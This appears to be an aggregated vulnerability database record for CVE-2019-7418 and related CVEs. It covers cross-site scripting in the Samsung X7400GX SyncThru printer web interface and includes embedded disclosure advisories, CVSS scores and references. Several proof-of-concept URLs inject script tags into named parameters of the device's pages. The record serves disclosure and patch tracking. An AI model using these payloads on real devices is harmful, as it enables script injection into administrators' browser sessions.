ID

VAR-201903-0461


CVE

CVE-2019-7418


TITLE

SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2019-002785

DESCRIPTION

SAMSUNG X7400GX SyncThru Web Service contains a cross-site scripting vulnerability. Information may be obtained and information may be altered.

# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7418
# Category: webapps

1. Description

XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.

2. Proof of Concept

URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org

URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org

URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org

URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org

URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org

URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT>

3. Solution: Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7419
# Category: webapps

1.

2. Proof of Concept

URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E
Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT>

URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento
Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT>

URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento
Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT>

3. Solution: Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7420
# Category: webapps

1. Proof of Concept

URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E

3. Solution: Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7421
# Category: webapps

1.

2. Proof of Concept

URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org

URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login
Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT>

3. Solution: Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

Trust: 0.9

sources: JVNDB: JVNDB-2019-002785 // VULHUB: VHN-158853 // PACKETSTORM: 151584

AFFECTED PRODUCTS

vendor: samsung
model: syncthru web service
scope: eq
version: -

Trust: 1.0

vendor: samsung
model: x7400gx
scope: eq
version: 6.a6.25

Trust: 1.0

vendor: samsung
model: syncthru web service
scope: -
version: -

Trust: 0.8

vendor: samsung
model: x7400gx
scope: -
version: -

Trust: 0.8

sources: JVNDB: JVNDB-2019-002785 // NVD: CVE-2019-7418

CVSS

SEVERITY


nvd@nist.gov: CVE-2019-7418
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-7418
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201902-607
value: MEDIUM

Trust: 0.6

VULHUB: VHN-158853
value: MEDIUM

Trust: 0.1

VULMON: CVE-2019-7418
value: MEDIUM

Trust: 0.1

CVSSV2

nvd@nist.gov: CVE-2019-7418
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-158853
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

CVSSV3

nvd@nist.gov: CVE-2019-7418
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-158853 // VULMON: CVE-2019-7418 // JVNDB: JVNDB-2019-002785 // CNNVD: CNNVD-201902-607 // NVD: CVE-2019-7418

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-158853 // JVNDB: JVNDB-2019-002785 // NVD: CVE-2019-7418

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201902-607

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 151584 // CNNVD: CNNVD-201902-607

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-002785

PATCH

title: Top Page
url: http://www.samsungprinter.com/

Trust: 0.8

title: SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities
url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89401

Trust: 0.6

title: Threatpost
url: https://threatpost.com/rapid-attacks-extort-ransomware/175445/

Trust: 0.1

sources: VULMON: CVE-2019-7418 // JVNDB: JVNDB-2019-002785 // CNNVD: CNNVD-201902-607

EXTERNAL IDS

db: NVD
id: CVE-2019-7418

Trust: 2.7

db: PACKETSTORM
id: 151584

Trust: 2.7

db: JVNDB
id: JVNDB-2019-002785

Trust: 0.8

db: CNNVD
id: CNNVD-201902-607

Trust: 0.7

db: VULHUB
id: VHN-158853

Trust: 0.1

db: VULMON
id: CVE-2019-7418

Trust: 0.1

sources: VULHUB: VHN-158853 // VULMON: CVE-2019-7418 // JVNDB: JVNDB-2019-002785 // PACKETSTORM: 151584 // CNNVD: CNNVD-201902-607 // NVD: CVE-2019-7418

REFERENCES

url:http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html

Trust: 3.2

url:http://www.samsung.com/support/productsupport/download/index.aspx

Trust: 1.9

url:http://seclists.org/fulldisclosure/2019/feb/28

Trust: 1.8

url:http://www.samsungprinter.com/

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2019-7418

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7418

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/79.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://threatpost.com/rapid-attacks-extort-ransomware/175445/

Trust: 0.1

url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&nfunc=closepopup('successmsg

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-7421

Trust: 0.1

url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e&ruifw_pid=maintenance&ruifw_title=mantenimiento

Trust: 0.1

url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=maintenance&ruifw_title=%3cscript%3ealert(xss);%3c/script%3e

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-7419

Trust: 0.1

url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&bullet=suc&func=&nfunc=closepopup('successmsg

Trust: 0.1

url:https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules

Trust: 0.1

url:http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e&popupid=id_login

Trust: 0.1

url:http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org

Trust: 0.1

url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e&ruifw_title=mantenimiento

Trust: 0.1

url:http://www.samsungprinter.com/,

Trust: 0.1

url:http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-7420

Trust: 0.1

url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=closepopup('successmsg

Trust: 0.1

url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&flag=&frame=&msg=the%20requested%20report(s)%20will%20be%20printed

Trust: 0.1

sources: VULHUB: VHN-158853 // VULMON: CVE-2019-7418 // JVNDB: JVNDB-2019-002785 // PACKETSTORM: 151584 // CNNVD: CNNVD-201902-607 // NVD: CVE-2019-7418

CREDITS

Rafael Pedrero

Trust: 0.1

sources: PACKETSTORM: 151584

SOURCES

db: VULHUB, id: VHN-158853
db: VULMON, id: CVE-2019-7418
db: JVNDB, id: JVNDB-2019-002785
db: PACKETSTORM, id: 151584
db: CNNVD, id: CNNVD-201902-607
db: NVD, id: CVE-2019-7418

LAST UPDATE DATE

2024-11-23T22:12:08.669000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-158853, date: 2019-03-25T00:00:00
db: VULMON, id: CVE-2019-7418, date: 2019-03-25T00:00:00
db: JVNDB, id: JVNDB-2019-002785, date: 2019-04-22T00:00:00
db: CNNVD, id: CNNVD-201902-607, date: 2019-04-01T00:00:00
db: NVD, id: CVE-2019-7418, date: 2024-11-21T04:48:11.237

SOURCES RELEASE DATE

db: VULHUB, id: VHN-158853, date: 2019-03-21T00:00:00
db: VULMON, id: CVE-2019-7418, date: 2019-03-21T00:00:00
db: JVNDB, id: JVNDB-2019-002785, date: 2019-04-22T00:00:00
db: PACKETSTORM, id: 151584, date: 2019-02-08T02:22:22
db: CNNVD, id: CNNVD-201902-607, date: 2019-02-08T00:00:00
db: NVD, id: CVE-2019-7418, date: 2019-03-21T16:01:12.750